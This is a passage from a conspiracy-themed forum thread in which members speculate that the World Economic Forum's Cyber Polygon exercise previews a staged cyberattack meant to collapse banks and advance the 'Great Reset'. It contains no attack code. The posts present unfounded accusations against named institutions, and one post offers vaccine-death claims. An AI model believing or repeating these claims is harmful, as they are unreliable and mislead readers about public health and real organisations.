    Cyber Polygon 2020 was both an ad for pro-Russian relations and a promotional exercise for Klaus Schwab and the World Economic Forum’s Great Reset. Some of the people who took part and supported the Cyber Polygon event are involved at the highest levels of cyber intelligence; some may have even been unofficial representatives of their national state intelligence apparatus. The decisions of several national governments to participate directly in the WEF-led Great Reset is no “conspiracy theory.” For instance, the incoming Biden administration sent its climate envoy, John Kerry, to the WEF annual meeting last month, where Kerry underscored the US commitment to the Great Reset agenda and the associated Fourth Industrial Revolution that seeks to automate most jobs being currently performed by humans. With the governments of Russia, China, the US, the UK, Israel, Canada, and India, among others, on board with this transnational agenda, it becomes deeply unsettling that high-ranking operatives in both the public and private sectors joined the WEF to conduct a simulation of a crisis that would clearly benefit the Great Reset agenda.
    As previously mentioned, the WEF cosponsored a simulation of a coronavirus pandemic just months before the actual event. Soon after the COVID-19 crisis began in earnest last March, Schwab noted that the pandemic crisis was just what was needed to launch the Great Reset as it served as a convenient catalyst to begin overhauling economies, governance, and social society on a global scale. If the destabilizing events simulated at Cyber Polygon do come to pass, it will likely be similarly welcomed by the WEF, given that a critical failure in the current global financial system would allow the introduction of new public-private “digital ecosystem” monopolies such as those being built in Russia by Sberbank.

    This effort by Sberbank to both digitize and monopolize access to all services, both private and public, may be appealing to some because of its apparent convenience. However, it will also be emblematic of what we can expect from Schwab’s Great Reset—monopolies of fused public- and private-sector entities disguised by the term “stakeholder capitalism.” What the general public does not realize yet is that they themselves will not be included among these “stakeholders,” as the Great Reset has been designed by the bankers and wealthy elite for the bankers and the wealthy elite.

    As for the Cyber Polygon 2020 event, the coming cyberpandemic is being prophetically thrown in our faces just as the pandemic exercise was prior to the actual disease’s appearance. Such prophetic warnings are coming not only from the WEF, however. For instance, the head of Israel’s National Cyber Directorate, Yigal Unna, warned last year that a “cyber winter” of cyberattacks “is coming and coming faster than even I suspected.” In the cyber directorate, Unna works closely with Israeli intelligence agencies, including the infamous Unit 8200, which has a long history of electronic espionage targeting the US and other countries and which has been responsible for several devastating hacks, including the Stuxnet virus that damaged Iran’s nuclear program. Israeli intelligence is also poised to be among the greatest beneficiaries of the Great Reset due to the strength of the nation’s hi-tech sector. In addition, last month saw the UAE’s central bank following Cyber Polygon’s lead by conducting its first-ever cyberattack simulation in coordination with the Emirati private-finance sector. Corporate media outlets, for their part, began this year by claiming that “cyberattacks may trigger the next crisis for banks” and, as of February 1, that “the next cyberattack is already underway.”

    Some will say that a “cyberpandemic” is an inevitable consequence of the quickly developing hi-tech world in which we live, but it still fair to point out that 2021 is the year that many have been predicting for the financial destruction of big institutions that will lead to new economic systems that align with the Great Reset. The inevitable collapse of the global banking system, resulting from the off-the-charts corruption and fraud that has run rampant for decades, is likely to be conducted through a controlled collapse, one that would allow wealthy bankers and elites, such as those that participated in Cyber Polygon, to avoid responsibility for their economic pillaging and criminal activity.

    This is especially true for Cyber Polygon participant Deutsche Bank, whose inevitable collapse has been openly discussed for years due to the bank’s extreme corruption, fraud, and massive exposure to derivatives. In late 2019, months before the COVID-19 crisis began, the CEO of Deutsche Bank warned that central banks no longer had tools that could adequately respond to the next “economic crisis.” It is certainly telling that entirely new banking systems, such as Sberbank’s soon-to-be-launched digital monetary monopoly, began to be developed just as it began to be publicly acknowledged that central banks’ traditional means of responding to economic calamities were no longer viable.

    A massive cyberattack, such as that simulated at Cyber Polygon 2020, would allow faceless hackers to be blamed for economic collapse, thus absolving the real financial criminals of responsibility. Furthermore, due to the difficult nature of investigating hacks and the ability of intelligence agencies to frame other nation states for hacks they in fact committed themselves, any boogeyman of choice can be blamed, whether a “domestic terror” group or a country unaligned with the WEF (for now, at least) like Iran or North Korea. Between the well-placed warnings, simulations, and the clear benefit for the global elite intent on a Great Reset, Cyber Polygon 2020 appears to have served not only its publicly stated purpose but its own ulterior motives.
    Last edited by ExomatrixTV; 8th June 2021 at 18:17.
    No need to follow anyone, only consider broadening (y)our horizon of possibilities ...

  22. The Following 9 Users Say Thank You to ExomatrixTV For This Post:

    amor (2nd March 2022), Bill Ryan (10th July 2021), Elainie (8th June 2021), Franny (10th June 2021), Gwin Ru (10th July 2021), mountain_jim (8th June 2021), Sue (Ayt) (10th July 2021), Sunny (9th June 2021), Tintin (8th June 2021)

  23. Link to Post #12
    Netherlands Avalon Member ExomatrixTV's Avatar
    Join Date
    23rd September 2011
    Location
    Netherlands
    Language
    English, Dutch, German, Limburgs
    Age
    57
    Posts
    22,586
    Thanks
    30,552
    Thanked 124,906 times in 20,684 posts

    Default Re: WEF planning cyber attack on financial system?

    No need to follow anyone, only consider broadening (y)our horizon of possibilities ...

  24. The Following 7 Users Say Thank You to ExomatrixTV For This Post:

    All is one (10th July 2021), Bill Ryan (10th July 2021), Franny (10th June 2021), Gwin Ru (10th July 2021), Harmony (12th July 2021), mountain_jim (8th June 2021), Tintin (8th June 2021)

  25. Link to Post #13
    Netherlands Avalon Member ExomatrixTV's Avatar
    Join Date
    23rd September 2011
    Location
    Netherlands
    Language
    English, Dutch, German, Limburgs
    Age
    57
    Posts
    22,586
    Thanks
    30,552
    Thanked 124,906 times in 20,684 posts

    Exclamation Re: WEF planning cyber attack on financial system?

    • "Next Crisis Bigger than COVID" - Power Grid/Finance Down - WEF's Cyber Polygon:

    Source: https://www.bitchute.com/video/7jdzaIvviv0x
    No need to follow anyone, only consider broadening (y)our horizon of possibilities ...

  26. The Following 9 Users Say Thank You to ExomatrixTV For This Post:

    All is one (10th July 2021), Bill Ryan (10th July 2021), Franny (10th June 2021), Gekko (8th June 2021), Gwin Ru (10th July 2021), Harmony (12th July 2021), mountain_jim (8th June 2021), Peace in Oz (10th June 2021), Tintin (8th June 2021)

  27. Link to Post #14
    United States Moderator Sue (Ayt)'s Avatar
    Join Date
    23rd December 2016
    Language
    English
    Posts
    2,546
    Thanks
    28,217
    Thanked 20,478 times in 2,544 posts

    Default Re: WEF planning cyber attack on financial system?

    The whole scenario sure is heating up this week in mainstream news!

    "Biden confronted Putin about cyber attacks by Russia-based actors during the Geneva summit. And earlier this week, Psaki said the White House has conveyed to Russian officials that there is a responsibility to respond after recent cyber attacks and that the US stands ready to "take action" if necessary."
    https://www.cnn.com/2021/07/09/polit...are/index.html

    As Gwin Ru posted in the depopulation thread, it is this weekend that the WEF is holding its Operation Cyber Polygon exercise.

    Source: https://www.rumble.com/video/vh0t77/?pub=njjqz

    The World Economic Forum Executive and his evil cohorts are meeting this weekend to 'war game' their next plot against freedom-loving global citizens as part of their attempt to CRUSH YOU and reign over every living being.

    www.StewPeters.tv | DeAnnaLorraine.com
    "We're all bozos on this bus"

  28. The Following 8 Users Say Thank You to Sue (Ayt) For This Post:

    All is one (10th July 2021), Bill Ryan (10th July 2021), Eva2 (10th July 2021), Gwin Ru (10th July 2021), Harmony (12th July 2021), mountain_jim (10th July 2021), Sunny (10th July 2021), Tintin (10th July 2021)

  29. Link to Post #15
    Belgium Avalon Member All is one's Avatar
    Join Date
    25th June 2021
    Language
    Dutch
    Age
    41
    Posts
    181
    Thanks
    882
    Thanked 1,144 times in 169 posts

    Default Re: WEF planning cyber attack on financial system?

    I’m wondering if all of this could be happening any time soon; what the best way would be to keep in contact & keep each other up to date with relevant info.

    I’ve seen many alternative info sites returning to newsletter and email lists …

    Would it be a good idea/possible to do something similar for the Avalon community?

  30. The Following 7 Users Say Thank You to All is one For This Post:

    Bill Ryan (10th July 2021), Gwin Ru (10th July 2021), Harmony (12th July 2021), Johan (Keyholder) (11th July 2021), mountain_jim (10th July 2021), Sunny (10th July 2021), Tintin (10th July 2021)

  31. Link to Post #16
    UK Avalon Founder Bill Ryan's Avatar
    Join Date
    7th February 2010
    Location
    Ecuador
    Posts
    34,206
    Thanks
    207,996
    Thanked 456,558 times in 32,726 posts

    Default Re: WEF planning cyber attack on financial system?

    Quote Posted by All is one (here)
    I’m wondering if all of this could be happening any time soon; what the best way would be to keep in contact & keep each other up to date with relevant info.

    I’ve seen many alternative info sites returning to newsletter and email lists …

    Would it be a good idea/possible to do something similar for the Avalon community?
    We do have all the Avalon members' emails archived.*

    If the site goes offline ** or is somehow inaccessible, the mods and I would be sure to contact every member by email. I don't think this will happen — but if it does, we can take it from there with a proactive plan about how best to all keep in touch and be informed.

    ~~~
    * Please DO make sure the email address we have for you is active and up to date. You can update your email address easily via your personal settings page, here: https://projectavalon.net/forum4/pro...o=editpassword

    ** We have a double backup (a duplicated additional system), which we announced here. So even if our main host goes offline, we do have an independent backup on a different continent with a different host.



  32. The Following 18 Users Say Thank You to Bill Ryan For This Post:

    Adi (10th July 2021), All is one (11th July 2021), BMJ (19th July 2021), Brodie75 (11th July 2021), ByTheNorthernSea (10th July 2021), edina (10th July 2021), Gwin Ru (10th July 2021), Harmony (12th July 2021), I am B (12th July 2021), kudzy (11th July 2021), mab777 (11th July 2021), meat suit (10th July 2021), mountain_jim (10th July 2021), Peace in Oz (12th July 2021), Sirus (10th July 2021), Tintin (10th July 2021), wegge (10th July 2021), Yoda (10th July 2021)

  33. Link to Post #17
    United States Moderator Sue (Ayt)'s Avatar
    Join Date
    23rd December 2016
    Language
    English
    Posts
    2,546
    Thanks
    28,217
    Thanked 20,478 times in 2,544 posts

    Default Re: WEF planning cyber attack on financial system?

    The WEF has its own youtube channel.
    Here is one video it put out in January:
    "We're all bozos on this bus"

  34. The Following 7 Users Say Thank You to Sue (Ayt) For This Post:

    Alecs (11th July 2021), avid (12th July 2021), Bill Ryan (10th July 2021), Gwin Ru (10th July 2021), Harmony (12th July 2021), mountain_jim (10th July 2021), Tintin (10th July 2021)

  35. Link to Post #18
    On Sabbatical
    Join Date
    26th September 2019
    Language
    None
    Posts
    3,411
    Thanks
    10,548
    Thanked 27,825 times in 3,335 posts

    Default Re: WEF planning cyber attack on financial system?

    He says that, but internally does nothing about it, as Putin requested, why is the US not sending notifications about the hacks? Or truly reporting them to Russia, at all?

    It's almost like they don't want Russia to look deeply into the hack, and that makes it very suspicious

    Walk the talk? The Us gov doesn't want to. It's a media show only for domestic consumption

    Quote Posted by Sue (Ayt) (here)
    The whole scenario sure is heating up this week in mainstream news!

    "Biden confronted Putin about cyber attacks by Russia-based actors during the Geneva summit. And earlier this week, Psaki said the White House has conveyed to Russian officials that there is a responsibility to respond after recent cyber attacks and that the US stands ready to "take action" if necessary."
    https://www.cnn.com/2021/07/09/polit...are/index.html

    As Gwin Ru posted in the depopulation thread, it is this weekend that the WEF is holding its Operation Cyber Polygon exercise.

    Source: https://www.rumble.com/video/vh0t77/?pub=njjqz

    The World Economic Forum Executive and his evil cohorts are meeting this weekend to 'war game' their next plot against freedom-loving global citizens as part of their attempt to CRUSH YOU and reign over every living being.

    www.StewPeters.tv | DeAnnaLorraine.com
    Last edited by Mashika; 10th July 2021 at 21:02.
    Tired

  36. The Following 6 Users Say Thank You to Mashika For This Post:

    Alecs (11th July 2021), Bill Ryan (10th July 2021), Harmony (12th July 2021), mountain_jim (12th July 2021), Sue (Ayt) (10th July 2021), Tintin (10th July 2021)

  37. Link to Post #19
    Avalon Member Andre's Avatar
    Join Date
    9th July 2010
    Location
    Byron Bay Area
    Language
    English
    Posts
    473
    Thanks
    342
    Thanked 2,518 times in 441 posts

    Default Re: WEF planning cyber attack on financial system?

    Quote Posted by Bill Ryan (here)
    Quote Posted by All is one (here)
    I’m wondering if all of this could be happening any time soon; what the best way would be to keep in contact & keep each other up to date with relevant info. I’ve seen many alternative info sites returning to newsletter and email lists … Would it be a good idea/possible to do something similar for the Avalon community?
    We do have all the Avalon members' emails archived.*

    If the site goes offline ** or is somehow inaccessible, the mods and I would be sure to contact every member by email. I don't think this will happen — but if it does, we can take it from there with a proactive plan about how best to all keep in touch and be informed.
    * Please DO make sure the email address we have for you is active and up to date. You can update your email address easily via your personal settings page, here: https://projectavalon.net/forum4/pro...o=editpassword

    ** We have a double backup (a duplicated additional system), which we announced here. So even if our main host goes offline, we do have an independent backup on a different continent with a different host.
    I guess a lot depends on the WEF's attack vector, but if they try to take down the entire internet to do a "great reset", I doubt that email will be accessible. Perhaps the real meaning of the term "great reset" is, in fact the reset/reboot of the internet itself.

    Off the top of my head, I would guess their main attack target is really the financial sector which many have surmised cannot continue much longer in its present form. This talk of bringing down hospital systems and so forth may be a smokescreen for that and the "reset" will bring in their digital currency platforms. Anyway, just speculation on my part. But perhaps we'll have to resort to fax machines and ham radio if they do bring the whole thing down!
    Last edited by Andre; 12th July 2021 at 09:05.
    Our destiny is in our hands. Let us visualise a world of truth, freedom and equality.

  38. The Following 3 Users Say Thank You to Andre For This Post:

    Harmony (12th July 2021), I am B (12th July 2021), mountain_jim (12th July 2021)

  39. Link to Post #20
    Avalon Member I am B's Avatar
    Join Date
    20th January 2021
    Posts
    339
    Thanks
    1,619
    Thanked 3,000 times in 335 posts

    Default Re: WEF planning cyber attack on financial system?

    Quote Posted by Sue (Ayt) (here)
    The WEF has its own youtube channel.
    Here is one video it put out in January:
    Throwing around some speculation, close to the lines of what Andre said. What may be the objective of the cyberthreats story now?

    - Internet "redesign", with no more avalon, and even less (if any already) freedom of speech.
    or
    - Internet shutdown to keep everybody close and uncomunicated. Although that with the existing alternative analogical comunication methods I highly doubt it. The point of this would be to have it done intermitently.

    - Yet another excuse for economical collapse and food shortages. A final blow on healthcare and economy.

    - Or both

    As far as I know, the huge part of the internet is into a "few" computers from amazon and google. When people start dying from the vaccine, they can just shut down parts of it, AND still look like heroes for fighting such attacks, as the video says, just like WHO with covid. And we know very well WHO and Big tech are well together since the beginning.

    On the other hand Right now, if google was shut down in any country, there would likely be revolts and huge unrest, with added economical damage. If big tech gets and excuse to "randomly" shut down any country's internet without being liable for it, they would factually be holding the whole world from the balls.

    I wouldn't take such a video for granted. Its from marketing basics to use the fame created by the last successful project to push the next one. And it was a HUGE project, so it wouldn't be used if it was not going all the way through.

    I find it more important than ever to create some alternative out of the grid comunication platform. I'm sure theres plenty of people here able to do so and some threads on it already.

  40. The Following 3 Users Say Thank You to I am B For This Post:

    amor (2nd March 2022), ExomatrixTV (15th December 2023), Harmony (22nd July 2021)

+ Reply to Thread
Page 1 of 2 1 2 LastLast

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts